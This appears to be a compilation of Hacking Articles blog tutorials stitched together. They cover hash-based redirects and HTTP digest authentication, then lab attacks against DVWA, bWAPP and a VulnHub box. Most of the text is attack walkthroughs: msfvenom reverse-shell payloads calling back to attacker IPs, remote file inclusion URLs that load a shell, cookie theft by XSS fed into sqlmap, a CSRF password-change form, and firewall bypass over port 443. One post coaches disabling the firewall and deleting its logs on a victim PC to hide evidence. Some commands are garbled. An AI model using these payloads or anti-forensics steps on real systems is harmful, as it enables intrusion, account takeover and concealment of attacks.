Hacking Articles|Raj Chandel's Blog

In previous article we have explained the concept of redirection with basic redirection and encoded redirections; in this article we will cover the more secured redirection using hashing and salting techniques.

In this article also we will be covering the redirection using the same php scripts with little modification within the code.

Redirection using Hash Values

On browser type http://localhost/hashing/home.php

Hover on Redirect Link pointing to redirection page (re.php). We can see that the redirection link not only contains the URL as a parameter but also the hash which means that we are not only passing the URL as a parameter but also generating the hash value using MD5/SH1/SHA512 or any of the hashing algorithm and redirection will only work if the combination of url and its hash is correct else not.

(Shown in the figure below). This is a more secure way of redirection.

For the sake of understanding our redirection link is showing the parameters like URL and Hash but in case or real development we can hide them so that attacker won't be able to judge where the page is being redirected.

When we click on Redirect Link redirection script on re.php will catch the passed URL and generate its hash value (we are using MD5 hash algorithm) and compare the generated hash value with the hash value we have sent with the request, if both the hash values matches the redirection would work else it will fail.

WE are using hash calculator for generating the MD5 Value of "http://www.hackingarticles.in".

The MD5 hash value of "http://www.hackingarticles.in" is 8258c1efb05943d059476150cb22df1d

In the below image we are replacing the original hash value of "http://www.hackingarticles.in" from its original value which is "8258c1efb05943d059476150cb22df1d" to any different value for example "9258c1efb05943d059476150cb22df1d" (we have replaced only first digit from 8 to 9).

The redirection has failed and script has returned an error message. Finally we are sending the URL along with the generated Hash Value as parameter and result is below

Redirection using Hash Values with salting

On browser type http://localhost/hashing/home.php (page where we have our scripts)

Hover on Redirect Link pointing to redirection page (re.php). Here we can see one more additional parameter salt. As in previous methodology we have worked with Hash values , while working with salting we are introducing one more parameter salt and generating the hash value of the URL by pre pending or appending the salt value in front of the url or at the end of the url. Salt value could be anything, it could be a combination of characters, digits , alphanumeric , special character or anything we want (In this example we are using the salt value "ignite"). By using salts we are further increasing the security for redirecting the URL.

For the sake of understanding our redirection link is showing the parameters like URL and Hash and Salt but in case or real development we can hide them so that attacker won't be able to judge where the page is being redirected.

When we click on Redirect Link redirection script on re.php will catch the passed URL and generate its hash value (we are using Sha1 hash algorithm) by appending the salt value (ignite) in front of the URL and compare the generated hash value with the hash value we have sent with the request, if both the hash values matches the redirection would work else it will fail.

in Above image we are generating the Sha1 hash value by appending the salt "ignite" in front of the URL "http://www.hackingarticles.in" , we can use any online/offline convertor in this example we are generating Sha1 hash through http://online-code-generator.com/sha1-hash-with-optional-salt.php

The sha1 hash value of the URL with salt is: 5955e7e3533a0afac6ddfee60a32e2a6731cf626

If the hash value sent is different from the original value our script will return an error. In below Image we are changing the sha1 hash value from 5955e7e3533a0afac6ddfee60a32e2a6731cf626 to 8955e7e3533a0afac6ddfee60a32e2a6731cf626 (we are replacing only first digit from 5 to 8) we will get the following result.

Finally we are sending the URL along with the generated Hash Value as parameter and result is below

In this article you will learn how to hack any web application server if it is suffering from remote file inclusion vulnerability. I have performed RFI attack using seven different techniques to exploit any web server. Here I have targeted BWAPP which a buggy web application server to perform all these attack.

Remote File Inclusion (also known as RFI) is the process of including remote files through the exploiting of vulnerable inclusion procedures implemented in the application. This vulnerability occurs, for example, when a page receives, as input, the path to the file that has to be included and this input is not properly sanitized, allowing external URL to be injected. Although most examples point to vulnerable PHP scripts, we should keep in mind that it is also common in other technologies such as JSP, ASP and others.

For more details visit OWASP.org

Let’s Begin!!!

Basic RFI Attack

Open target IP in the browser and login inside BWAPP as bee: bug now choose the bug remote & local file Inclusion then click on hack.

Here the requested web page which is suffering from RFI & LFI Vulnerability gets open. Where you will find a comment to select a language from the given drop down list, when you click on go button the selected language file get included in URL.

Now prepare PHP malicious file using msfvenom for attack and start multi handler at the background.

Msfvenom –p php/meterpreter/reverse _tcp lhost= 192.168.1.11 lport 4444 –f raw

Then copy the highlighted text in a text file.

If you notice the below screenshot carefully here you will find that I have saved above copied PHP code as shell.php inside /var/www/html, so that shell.php file could be included for RFI attack.

To perform basic attacks manipulate URL to include php file remotely.

http://192.168.1.113/bWAPP/rlfi.php?language=lang_en.php&action=go into192.168.1.11/bWAPP/flfi.php? language=http://192.168.1.11/shell.php

As soon as you will execute the URL, you will get reverse connection through meterpreter session.

Meterpreter> sysinfo

Forced Extension RFI Attack

Repeat the same process and add ‘?’ (Question mark) symbolat the end of URL. Must remember that multi handler should be running at the background of metasploit framework.

http://192.168.1.113/bWAPP/rlfi.php?language=lang_en.php&action=go into192.168.1.11/bWAPP/flfi.php? language=http://192.168.1.11/shell.php?

Again when you will execute URL, it will give you another meterpreter session.

Meterpreter> sysinfo

Null Byte RFI Attack

Now to make null byte attack you need to capture the sending request between browser and web server. Here to perform the attack with help of burp suite kindly turn on burp suite then make intercept on and set browser proxy. From given screenshot you can see I have captured the GET request.

Again if you notice the highlighted text in the given below image you will find that I have edited ‘’ (null character) to make null injection attack. Now before forwarding the GET request make sure your multi handler must be running at the background and then click on forward tab.

As soon as they GET request will be forward you will get victim’s reverse connection through meterpreter sessions.

Meterpreter> sysinfo

Change HTTP

The forth technique is similar to the first technique the attacker just need to make very small change in URL and if you notice the following screenshot you will find that I have changedhttp into HTTP. It might be possible that in some situation when security level get increased small character http get failed to include file remotely.

http://192.168.1.113/bWAPP/rlfi.php?language=lang_en.php&action=go into192.168.1.11/bWAPP/flfi.php? language=HTTP://192.168.1.11/shell.php

So after making changes now execute the URL and must keep multi handler running at the background which will further provide a new session again through meterpreter.

Meterpreter> sysinfo

Change Image Extension

In next attack you will find that I had included an image remotely to hack web application server which is not a real image but our php malicious file. So now open your shell.php file and edit GIF98 inside your PHP file as shown in following screenshot and save it as shell.gifat same location i.e. /var/www/html.

Here again make small change in URL to include malicious image.

http://192.168.1.113/bWAPP/rlfi.php?language=lang_en.php&action=go into192.168.1.11/bWAPP/flfi.php? language=http://192.168.1.11/shell.gif

Now when again you will execute URL, another meterpreter session gets open for you.

Meterpreter> sysinfo

Black List RFI Attack

If you have read file uploading article you must be aware of black list where we can inject our file by changing a number of letters to their capital forms to bypass the case sensitive rule, for example PHP or PHP3

You can apply this technique when security level is high, manipulate.php into .PHP; I have renamed shell.php into shell.PHP at same location and then execute shell.PHP with help of URL.

http://192.168.1.113/bWAPP/rlfi.php?language=lang_en.php&action=go into192.168.1.11/bWAPP/flfi.php? language=http://192.168.1.11/shell.PHP

From following screenshot you can see I have got another session through meterpreter.

Meterpreter> sysinfo

Base64 encoded

Now there is another way to exploit RFI when the security level is high and you are unable to view the PHP file content, and then use the following PHP function.

With help of hackbar which a Firefox plug-in I had performed this attack. First you need to load URL then manipulate URL as shown in the screenshot then click on execute tab.

http://192.168.1.113/bWAPP/rlfi.php?language= php://filter/read=convert.base64-encode/resource= http://192.168.1.11/shell.php

WONDERFUL!!!We have got meterpreter session through seven different techniques. You can also perform all these attack using online script like c99 shell.

Meterpreter> sysinfo

This article is written to bring awareness among all security researchers and developers so that they may be able to learn the level of damage cause by XSS attack if the web server is suffering from cross site scripting vulnerability.

Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. The end user’s browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site.

Stored XSS (Persistent or Type I)

Stored XSS generally occurs when user input is stored on the target server, such as in a database, in a message forum, visitor log, comment field, etc. And then a victim is able to retrieve the stored data from the web application without that data being made safe to render in the browser. With the advent of HTML5, and other browser technologies, we can envision the attack payload being permanently stored in the victim’s browser, such as an HTML5 database, and never being sent to the server at all.

Refernce: owasp.org

Lets start!!!

Attacker: Kali Linux

Target: DVWA

For this tutorial I had targeted DVWA and explore localhost IP in browser; now login with admin: password and select the stored cross site scripting vulnerbility from given list of vulnerbility.

Now have a look over a small script which would generate an alert window. So in the text area given for message I will inject the script which get store in the server.

Now when user will visit this page to read our message his browser will execute our script which generates an alert prompt as showing following screenshot.

This was a small demo to show how to inject any script if server is suffering from XSS and further you will learn what else an attacker can do to cause damage inside a web application server.

If attack is aware that the web server is having XSS then he might think to steal the web cookies which contain session Id therefore he will generate a script to fetch running cookies.

In following screenshot you can see I have injected the script to get web page cookies.

Now when user will visit this page to read our message his browser will execute our script which generates an alert prompt as showing following screenshot.

This was a small demo to show how to inject any script if server is suffering from XSS and further you will learn what else an attacker can do to cause damage inside a web application server.

If attack is aware that the web server is having XSS then he might think to steal the web cookies which contain session Id therefore he will generate a script to fetch running cookies.

In following screenshot you can see I have injected the script to get web page cookies.

Here in given below image when I have executed the script I have successfully fetched the browser cookies and now further I will use this cookies for retrieving the data of web application server.

SQL INJECTION WITH XSS

It might be possible that the web application server has more than one vulnerabilities, let assume if it is also having SQL injection vulnerability then it become very easy for attacker to retrieve the data from its database using stolen cookies.

For example in DVWA I switch from XSS to SQL injection; now copy its URL with user ID=1.

From above we have browser cookie and target URL for making SQL injection attack. Now open the terminal in your kali Linux and use above cookie and URL inside the command of sqlmap as shown in screenshot

Sqlmap – u “http://192.168.1.8/dvwa/vulnerbilities/sqli/?id=1&submit=submit” –cookie=“security=low; PHPSESSID=r12pk67cuq3s7eo4iktb88sud2” –dbs --batch

Hence you can see it has fetched all present database names inside database system.

Gaining Shell Access with XSS

Now let assume if server is suffering from XSS as well as file uploading both vulnerabilities; in this case how an attacker would be able to cause harm to the web application server.

Firstly let’s prepare our malicious PHP file for uploading in web server. As we always use msfvenom for this purpose and then save the generated PHP codes in a text file as shell.php

Msfvenom –p php/meterpreter/reverse_tcp lhost=192.168.1.11 lport=4444 –f raw

Again I switched to file uploading vulnerability in DVWA to upload shell.php and from screenshot you can see our shell.php file is successfully uploaded now copy the highlighted path.

Start multi handler inside the metasploit framework.

Here the text area given for message length is not sufficient to inject our next script therefore make right click on window and select inspect element to view it’s given message length for text area.

Here you can see message length for text area is decided as “50”.

Change message length from “50 to 500” so that it becomes easy to inject our next script.

Now in following screenshot you can see I have injected the path of uploaded file in script which will get saved in the server. When user click on it to read the message he will execute our shell.php file which provide reverse connection on attacker machine.

Here you can see as soon as script will execute it has shown meterpreter session for victim’s PC.

Meterpreter>sysinfo

HTTP authentication uses methodologies via which web servers and browsers securily exchanges the credentials like user names and passwords. Http authentication or we can also call it as Digest Authentication follows the predefined methods / standards which use encoding techniques and MD5 cryptographic hashing over HTTP protocol.

In this article we are covering the methodologies/standards used for Http Authentication.

For the sake of understanding we will be using our php scripts that will simply capture user name and passwords and we will generate the Authorization value as per the standards.

For http codes visit here

Basic Access Authentication using Base 64 Encoding

In basic Authentication we will be using base 64 encoding for generating our cryptographic string which contains the information of username and password. Please note we can use any of the encoding techniques like URL, Hexadecimal, or any other we want.

The below example illustrates the concept, we are using Burpsuite for capturing and illustrating the request.

The webpage is asking for input from the client

We are providing "hackingarticles" as User Name and "ignite" as password.

Syntax of basic Authentication

Value = username:password

Encoded Value = base64(Value)

Authorization Value = Basic

In basic authentication username and password are combined into a single string using a colon in between.

Value = hackingarticles:ignite

This string is then encoded using base 64 encoding.

Encoded Value = base64 encoded value of hackingarticles:ignite which is aGFja2luZ2FydGljbGVzOmlnbml0ZQ==

Finally the Authorization Value is obtained by putting the text "Basic" followed by before the encoded value. (We can capture the request using burpsuite to see the result)

The Authorization Value for this example is "Basic aGFja2luZ2FydGljbGVzOmlnbml0ZQ==" . This is the value which is sent to the server.

Finally the server is decrypting the authorization value and returning the entered credentials

Basic Authentication is less secure way because here we are only using encoding and the authorization value can be decoded, In order to enhance the security we have other standards discussed further.

RFC 2069 Digest Access Authentication

Digest Access Authentication uses the hashing methodologies to generate the cryptographic result. Here the final value is sent as a response value.

RFC 2069 authentication is now outdated now and RFC2617 which is enhanced version of RFC2069 is being used.

For the sake of understanding the syntax of RFC 2069 is explained below.

Syntax of RFC2069

Hash1=MD5(username:realm:password)

Hash2=MD5(method:digestURI)

response=MD5(Hash1:nonce:Hash2)

Hash1 contains the MD5 hash value of (username:realm:password) where realm is any string

provided by server and username and passwords are the input provided by client.

Hash2 contains the MD5 hash value of (method:digestURI) where method could be get or post depending on the page request and digestURI is the URL of the page where the request is being sent.

response is the final string which is being sent to the server and contains the MD5 hash value of (hash1:nounce:hash2) where hash1 and hash2 are generated above and nonce is an arbitrary string that could be used only one time provided by server to the client.

RFC 2617 Digest Access Authentication

RFC 2617 digest authentication also uses MD5 hashing algorithm but the final hash value is generated with some additional parameters

Syntax of RFC2617

Hash1=MD5(username:realm:password)

Hash2=MD5(method:digestURI)

response=MD5(Hash1:nonce:nonceCount:cnonce:qop:Hash2)

Hash1 contains the MD5 hash value of (username:realm:password) where realm is any string

Provided by server and username and passwords are the input provided by client.

Hash2 contains the MD5 hash value of (method:digestURI) where method could be get or post depending on the page request and digestURI is the URL of the page where the request is being sent.

response is the final string which is being sent to the server and contains the MD5 hash value of (Hash1:nonce:nonceCount:cnonce:qop:Hash2) where Hash1 and Hash2 are generated above

and for more details on other parameters refer "https://technet.microsoft.com/en-us/library/cc780170(v=ws.10).aspx"

The actual working of RFC2617 is described below

The webpage is asking for input from the client

We are providing "guest" as User Name and "guest" as password.

Through burpsuite we are capturing the request so that all the parameters could be captured and we can compare the hash values captured with the hash values that we will generate through any other tool (hash calculator in this case).

We have captured the values for the following parameters

realm="Hacking Articles", nonce="58bac26865505", uri="/auth/02-2617.php", opaque="8d8909139750c6bd277cfe1388314f48", qop=auth, nc=00000001, cnonce="72ae56dde9406045" , response="ac8e3ecd76d33dd482783b8a8b67d8c1",

Hash1 Syntax=MD5(username:realm:password)

hash1 = md5(guest:Hacking Articles:guest)

The MD5 hash value is calculated as 2c6165332ebd26709360786bafd2cd49

Hash2 Syntax =MD5(method:digestURI)

Hash2=MD5(GET:/auth/02-2617.php)

MD5 hash value is calculated as b6a6df472ee01a9dbccba5f5e6271ca8

response Syntax = MD5(Hash1:nonce:nonceCount:cnonce:qop:Hash2)

response = MD5(2c6165332ebd26709360786bafd2cd49:58bac26865505:00000001:72ae56dde9406045:auth:b6a6df472ee01a9dbccba5f5e6271ca8)

MD5 hash is calculated as ac8e3ecd76d33dd482783b8a8b67d8c1

Finally the response value obtained through hash calculator is exactly same as that we have captured with burp suit above.

Finally the server is decrypting the response value and the following is the result

in this article you will learn Cross-site request forgery attack. For CSRF tutorial I have targeted DVWA and try to bypass low security level.

Cross-site request forgery, also known as one-click attack or session riding and abbreviated as CSRF (sometimes pronounced sea-surf) or XSRF, is a type of malicious exploit of a website where unauthorized commands are transmitted from a user that the website trusts. Unlike cross-site scripting (XSS), which exploits the trust a user has for a particular site, CSRF exploits the trust that a site has in a user's browser.

An attacker may forge a request to log the victim into a target website using the attacker's credentials; this is known as login CSRF. Login CSRF makes various novel attacks possible; for instance, an attacker can later log into the site with his legitimate credentials and view private information.

Reference:en.wikipedia.org/wiki/Cross-site_request_forgery

Let’s start!!!

By default the credential set for DVWA is admin: password. As you can see I have used them for login in DVWA.

Now set securitylevel at low and select the bug cross site request forgery as current vulnerability. Here you see the text fields are given for changing the password of the database for user admin.

Now open the view source page and copy the highlighted text.

Then paste above copied HTML code inside a text file. If you are aware of HTML coding then it will be very to understand the following syntax inside the notepad which will create a form to reset the password of a web page. Now save the file as csrf.html

Now when you will open the csrf.html file it will look like the given below image where it contains the text field for password and a submit button.

Now again open csrf.html with notepad to edit the value inside the text field given for new password and confirm password. In following screenshot you can see I have given value= “hacker” as new password and confirm password. Then again save it with csrf.html

Now when again you will open csrf.html file you will find that the blank text field are given for password is get filled.

Now when you will click on change button the password will reset for that web page. This is all about how html form will work and from given screenshot you can read the sent GET request for changing password through URL.

Since this tutorial is related to bypass low security in DVWA therefore we need to add target location inside the html form to make CSRF attack for changing the password for admin without his permission.

Now copy the URL as shown in the following image.

Again open csrf.html with notepad and replace # from above copied URLwhich will directly change the password of targeted location for user admin.

Here you can read the final syntax for html form to change the password for admin inside DVWA without his involvement. Now send this crsf.html file to victim using social engineering or phishing technique to trap the victim for exploiting with CSRF attack.

New password:

Confirm new password:

When victim will open the csrf.html file and click on change button the password will get changed for admin inside DVWA.

From screenshot you can see without admin permission we have successfully changed his password.

Now let’s verify, as we know the previous credential was admin: password; here when I try to use them it shows the login failed.

Further when I try with admin: hacker as current credential, I login successfully inside DVWA. This was all about CSRF tutorial to bypass low security in DVWA.

In previous the firewall penetration testing article you might have read how firewall is used for blocking any particular port in a network to prevent hackers or malicious software from gaining access to your PC. This article is written to describe that how an attacker can bypass firewall rules and try to make unauthorized access of victim’s PC.

Target: windows PC

Attacker: Kali Linux

Lets start!!!

Open window firewall control panel and select Advance setting to configure firewall rules as shown in screenshot.

Go to outbound rules to configure new rule for firewall to add security layer in network to secure it form attackers.

Select the type of firewall rule to be created click radio button for option Port that controls connections for a TCP and UDP port then click on next.

Now specify the protocol and port to which rule is applies therefore I choose TCP and then specify port 4444 on which this rule will applies and then click on next.

Select radio button for block the connectionwhen connection matches to the condition specified condition.

Select allcheck boxes when this rule applies.

Here give the name to your own specified rule. You can see in the screenshot I had named it block port 4444 and then click on finished.

Here you can see the new outbound rule is added into the list of outbound rules. Hence victim has defense himself from establishing connection with port 4444, now if attacker try to connect with victim through port 4444 then it might be possible that attacker doesn’t receive any reverse connection.

Now let’s examine when an attacker tries to send malicious file using port 4444, will it work or not. Does attacker able to receive reverse connection of victim’s pc?

Here I have generated a malicious file using msfvenom in the format of .exe file and then send this 4444.exe file to victim and start multi handler at background.

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.102 lport=4444 -f exe > /root/Desktop/4444.exe

Now let’s find whether we will succeed or get failed to achieve reverse connection of victims PC.

use multi/handler

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.1.102

msf exploit(handler) > set lport 4444

msf exploit(handler) > exploit

OOPS!!! No response

It means we get failed in establishing connection between victim and attacker. Now as we know victim has protected himself from connecting with port 4444.

Now whenever you face such type of restriction for establishing connection with victim then do not get disappoint think twice what is the aim of an attack? He only wants to trap victim and want to establish a connection.

Now send your malicious file on those ports which always left open for incoming and outgoing connection. For example port 80, port 443, port 445 and etc.

When again an attacker tries to send malicious file using port 443. Does attacker able to receive reverse connection of victim’s pc?

msfvenom -p windows/meterpreter/reverse_https lhost=192.168.1.102 lport=443 -f exe > /root/Desktop/443.exe

Start multi handler and send 443.exe to victim.

use multi/handler

msf exploit(handler) > set payload windows/meterpreter/reverse_http

msf exploit(handler) > set lhost 192.168.1.102

msf exploit(handler) > set lport 443

msf exploit(handler) > exploit

GREAT!!! Attack is successful

We successfully got meterpreter session of victim’s PC inside the metasploit framework.

In previous article we have discussed about how to bypass low level security if a web application server is suffering from cross site request forgery (CSRF). Today we will see how to exploit a web application server with CSRF attack if the security level get increased or say set to medium and try to change the password of admin without his permission.

Let’s start!!!

Again I have target DVWA for this tutorial and by default the credential set for it is admin: password. As you can see I have used them for login in DVWA

Set security level medium select the bug cross site request forgery as current vulnerability. Here you see the text fields are given for changing the password of the database for user admin.

If you remembered in the previous article we have executed csrf.html file to change the password for admin when security level is low.

In following screenshot you can see I have given value= “hacker” as new password and confirm password.

Now I am going to test whether the same file csrf.htmlwould be capable to change the password for admin when security level is medium. From screenshot you can see I try to execute csrf.html file which might reset the password.

As result you can see I didn’t successesto bypass medium security using csrf.html and got an error message “that request didn’t look correct”. Hence the technique which we have used in low security will get failed in medium security level.

Sometimes it might be possible that a web application server may have more than one vulnerabilities in it. It could be a big advantage because making use of other vulnerability we can perform an action to execute our malicious file through it.

Now first of all change csrf.html into csrf.phpfile, then set low security level and switch into file uploadingvulnerability inside DVWA.

Here the above text file of html form is now saved as csrf.php is successfully uploaded in the server which you can see from given screenshot.

Now browse the path 192.168.1.102:81/dvwa/hackable/uploads/csrf.phpin URL to execute csrf.php file and click on change button.

GREAT!!!

From screenshot you can see without admin permission we have successfully changed his password.

Now let’s verify, as we know the previous credential was admin: password; here when I try to use them it shows the login failed.

Further when I try with admin: hacker as current credential, I login successfully inside DVWA. This was all about CSRF tutorial to bypass medium security in DVWA.

In network penetration testing, we always wish to hack a system of an internal network and try to make an unauthorized access through meterpreter session using metasploit framework. But there are some exploits which provides directly victim’s command shell instead of meterpreter session. In this article we have tried to upgrade from victim’s shell to meterpreter shell.

In previous article we had discussed related to how to access victim’s shell. Now once you have access victims command shell then follow the given below step to upgrade a command shell into meterepreter shell.

Here I have already access command shell of victim’s Pc

msf auxiliary(telnet_login) >sessions

In following screenshot you can perceive that it is showing the TYPE for session 1: shell.

This module attempts to upgrade a command shell to meterpreter. The shell platform is automatically detected and the best version of meterpreter for the target is selected. Currently meterpreter/reverse_tcp is used on Windows and Linux, with python/meterpreter/reverse_tcp' used on all others.

use post/multi/manage/shell_to_meterpreter

msf post(shell_to_meterpreter) > set session 1

msf post(shell_to_meterpreter) > exploit

Let’s verify the TYPEfor session 2

msf post(shell_to_meterpreter) >sessions

Now have a look over last image which is showing the new session i.e. session 2 is a meterpreter session.

Today in this article we’ll try to compromise the target using VNCpayload. In this tutorial you’ll learn how to create a VNC payload using msfvenom and try to achieve VNC shell of victim’s PC.

Open the terminal in your Kali Linux and type following command to generate a VNC payload using msfvenom command.

Msfvenom –p windows/vncinject/reverse_tcp lhost=192.168.1.15 lport=4444 –f exe > /root/Desktop/vnc.exe

Now the above command will generate an exe file for the VNC payload on the desktop of Kali Linux. Being an attack you need to send this backdoor to the target and start multi handler in the metasploit framework.

msfconsole

use multi/handler

msf exploit(handler) > set payload windows/vncinject/reverse_tcp

msf exploit(handler) > set lhost 192.168.1.103

msf exploit(handler) > set lport 4444

msf exploit(handler) > exploit

Now attacker tries to connect with target using VNC payload, from given screenshot you can see it has launched vncviewer and we have our session 1 is running at background.

In previousarticle we have seen how to upgrade a command shell into meterpreter using Post exploitation in metasploit. Again we are going to perform same task using a different technique.

LETS BEGIN!!!

msf auxiliary(telnet_login) >sessions

In following screenshot you can perceive that it is showing the TYPE for session 1: shell.

Once you got the reverse connection of remote system and access its command shell through metasploit now you can manipulate your active sessions. You just need to type sessions –h as command inside metasploit, this help command will display the multiple option which can be utilized with active session.

msf auxiliary(telnet_login) >sessions –h

So in the following screenshot you can perceive that the highlighted option is used to upgrade a command shell into meterpreter session.

Since we have command shell so here we can use “-u” (option) with session ID for upgrading our shell into meterpreter session. Execute following command for session manipulation.

msf auxiliary(telnet_login) >sessions –u 1

When you will execute above command you will get meterpreter session as session 2. Now enjoy your meterpreter session and execute its command.

msf auxiliary(telnet_login) >sessions

If you are a network penetration tester then you must read this article to enhance your skill. It is the part of advance penetration testing which might help in creating a strong payload for an attack to the targeted system. In this article your will learn more about the strength of msfvenom, here we will create such a payload which is different from my previous tutorial. The payload migrate its process if current process gets killed hence attacker will not lose his session if victim kills the current process ID of the payload from its system.

LETS!!! START

Open the terminal in kali Linux and type following command to generate exe payload.

Msfvenom –p windows/meterpreter/reverse_tcp lhost=192.168.1.104 lport=5555 prependmigrate=true prepenmigrateprocess=explorer.exe –f exe > /root/Desktop/raj.exe

Above command will create the raj.exe file on the Desktop now send this file to remote system for attack

Load metasploit framework and type following command to start the attack.

msfconsole

use multi/handler

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.0.104

msf exploit(handler) > set lport 5555

msf exploit(handler) > exploit

When victim will open raj.exe file we will get meterpretersession.

meterpreter> sysinfo

Now let check the process ID of our payload.

meterpreter> ps

From the highlighted text you can read the process ID shown for raj.exe i.e. 4960.

Now attacker tries himself to kill the current process state for raj.exe to verify process migration, as result process 4960 get killed.

meterpreter> kill 4960

But!!! Still we have victim’s session which means raj.exe file migrate into new process ID.

meterpreter> sysinfo

Again we are sharing our experience with our visitors to enhance their skills and ability. In this article you will learn how to manage multiple sessions of different targets in a network. Once you hacked more than one system in a network and received multiple meterepreter session in your Kali Linux then how will you retrieve data simultaneously from all targets.

LET’s PROCEED!!!

First an attacker needs to create a payload and share it in the network with his targets, then start multi handler in metasploit framework. Now when the available targets will open the payload in their system, the attacker will receive the series of sessions.

Here you can see from given screenshot I have receive two sessions from different system.

msf exploit(handler) > sessions

In order to gather the information from both targeted system simultaneously I had used post exploitation which let an attack to execute same command for multiple sessions at a time.

This module executes an arbitrary command line

msf exploit(handler) > use post/multi/general/execute

msf post(execute) > set command ipconfig

msf post(execute) > set session 1

msf post(execute) >exploit

In given screenshot you can see I have executed ipconfig to know the network configuration for session 1 and here the target IP is 192.168.0.100 as result.

Then in next step I just need to change session from 1 into 2 so that I can know network configuration for session 2 also and here the target IP is 192.168.0.105 as result.

msf post(execute) > set session 2

msf post(execute) >exploit

LETS START!!!

Let have a look where you will learn more about firewall security. Open windows firewall then select advance setting on the left side under control panel home.

Here we are at windows firewall advance setting; explore its property tabpresent on the right side of window’s frame.

Now you can see the local computer property dialog box has been opened, here select the private profile option.

Here another dialog box will get appear in front of you to configure private profile for firewall.

Only we need to manipulate two things in this profile without disturbing other settings. Change “NO (default)” into “YES” for log dropped packets and log successful connection as shown in given screenshot. At last click on OK.

Now again we are at advance security setting of firewall here bring your cursor down toward monitoring option. From screenshot you can see window frame for firewall monitoring where it contains general and logging setting. As we want to read firewall logs therefore now click on the blue link given as file name under logging setting.

GREAT!!! Finally we can read firewall log and can investigate firewall traffic in our network.

This article is only for tutorial purpose where we are trying to share our experience to enhance skills of IT researchers. This article will help attackers to protect themselves if they were caught by firewall. Usually when an attacker establish the connection with target’s system a log is generated having some details like time, ports, IP address and MAC address of attacker. So if you are not aware of such things then you might leave an evidence of your attacks in victim’s system. To prevent yourself you must go through this article where you will learn how to read the firewall logs as well as how to delete the logs from victim’s PC.

Being an intelligent attack once you have hacked the target then after fetching important data the most essential thing is to read and delete the log files from the target system.

First hack The Victim PC read Here

So now we are inside windows/system32 where we can perform admin level task. Type following command inside CMD shell to move inside the logs directory

cd logfiles/firewall

Type dir to observe the present directory of firewall.

Dir

From screenshot you can find that there are two files and two directories, therefore being an attacker I need to check the log firewall from target PC. Now Type following command to read firewall logs.

type pfirewall.log

So the highlighted log is showing MAC address of attacker system. Hence to protect yourself always delete these logs.

To delete pfirewall.log we must turn off firewall, type following command to disable firewall from victim PC.

Netsh firewall set opmode mode= DISABLE

Now type given below command to delete pfirewall.log

Del pfirewall.log

Now type given below command to verify pfirewall.log is still available or not in victim’s PC

type pfirewall.log

Today in this article we’ll try to compromise the target through VNC payload attack using very simple method for beginners. In this tutorial they’ll learn how to create a VNC payload using set tool kit and try to achieve VNC shell of victim’s PC.

Let’s Start!!!

Application > social engineering toolkit

A terminal will launch with set tool kit wizard here select first option to start social engineering attacks.

Type 1

Now we have to select another option to choose any one attack among following. Select create a payload and listener.

Type 4

Here we will select our payload option since we are performing VNC attack therefore we need to go with third option for VNC payload.

Type 3

In next step it requires IP address for payload listener which is 192.168.0.104 (attacker’s IP) then after that it will ask to enter the port for reverse listener and that will be 4444.

Now it starts generating VNC payload and save that payload under heighted path. Explore /root./set//payload.exe and send payload.exe to target.

Further it will ask to start payload listener type Y and hit enter which will start loading metasploit framework.

Here it launches metasploit framework and start multi handler automatically; now once the victim click on payload.exefile sent by attacker, attacker will get victim’s VNC shell.

Wonderful!!!

Our VNC attack using set toolkit is successful and we received victim’s VNC shell on our system.

Drive Droid is an Android application that allows you to boot your PC from ISO/IMG files stored on your phone. This is ideal for trying Linux distributions or always having a rescue-system on the go... without the need to burn different CDs or USB pen drives.

Drive Droid also includes a convenient download menu where you can download USB-images of a number of operating systems from your phone. You can also create USB-images which allow you to have a blank USB-drive where you can store files in. Blank images also allow you to use tools on your PC to burn images to the drive and create a bootable USB disk that way.

You can manually download it from google playstore.

Note: need root privilegde means you need rooted phone.

Let’s start!!!

Install DriveDroid app on your smartphone and run the application.

Click on plus signat the lower right corner to add any iso image file.

Under preference here we need to select image directories so that we can browse konboot iso image file.

Further it will move into internal storage to let you choose your iso file, I have opt for konboot.iso and click on select (Please note that the kon-bootCD.iso file should exist on your phone)

Selected the koonboot iso file and it will get mounted

Tap on the mounted file and we can see three boot options as shown in the figure below Select the third option of CD-ROM and connect the smart phone with the system and reboot the system

Now plug the USB cable between phone and system for booting it from your phone and restart the system (pc) then continuously press function key of your desktop system.

Great!!! Successfully you will get administration console; now hit the enter button on the key board. This will bypass the admin console without entering password.

Once again we are with the vulnhub labs tutorial; this article is related to CTF lab where you will face three challenges to complete the task. This lab is pretty good for beginner as they have to seize only three flag: 1. Get a shell 2. Get root access 3. There is a post exploitation flag on the box. You can download it from here.

LET’S BEGIN!!!

Now scan particular IP with version scan using Nmap tool as given in the image.

Nmap –sV 192.168.0.122

Here it point up the open ports and running services on it. As shown port 22, 53, 80, 445 and etc. are open.

Since port 80 is open therefore let explore target IP: 192.168.1.122 on the browser. From screenshot you can see I have not got any remarkable thing from here.

Later I had used nikto for complete scan and here you can see it has shown robots.txtcontains two entries from the highlightedtext in the given screenshot.

Again I move towards browser to explore roborts.txt here I found wordpress as one of the entry in it.

Further I look around following path: 192.168.0.122/wordpressin browser where I found a wordpress administrator console.

To breach administrator console of the wordpress we can use WPscan tool; now type following command to start wpsan enumeration.

Wpscan –url http://192.168.0.122/wordpress/ --enumerate u

At last I have received two users name from it scanning result, now use admin credential for login inside the wordpress

Accordingly under admin console we can upload any theme, taking advantage of admin’s right we will try to upload malicious script to achieve reverse connection from victim’s system. Now use msfvenom to generate malicious PHP script and type following command.

Msfenom –p php/meterpreter/reverse_tcp lhost=192.168.0.122 lport=4444 –f raw

From screenshot you can read the generated PHP script, at this instant we need to copy the text from *further we will past it inside wordpress template as a new theme.

Now past above copied PHP text * here as new theme under selected 404.php template.

On other hand Load metasploit framework and start multi/handler

When you will execute your uploaded theme in browser you will receive reverse connection at multi/handler and get meterpreter session of victim’s system.

Here form screenshot you can see through meterpreter we have access victim’s shell.

Meterpreter> sysinfo

Meterpreter>shell

Echo “import pty; pty.spawn(‘/bin/bash)” > /tmp/asdf.py python .tmp/asdf.py

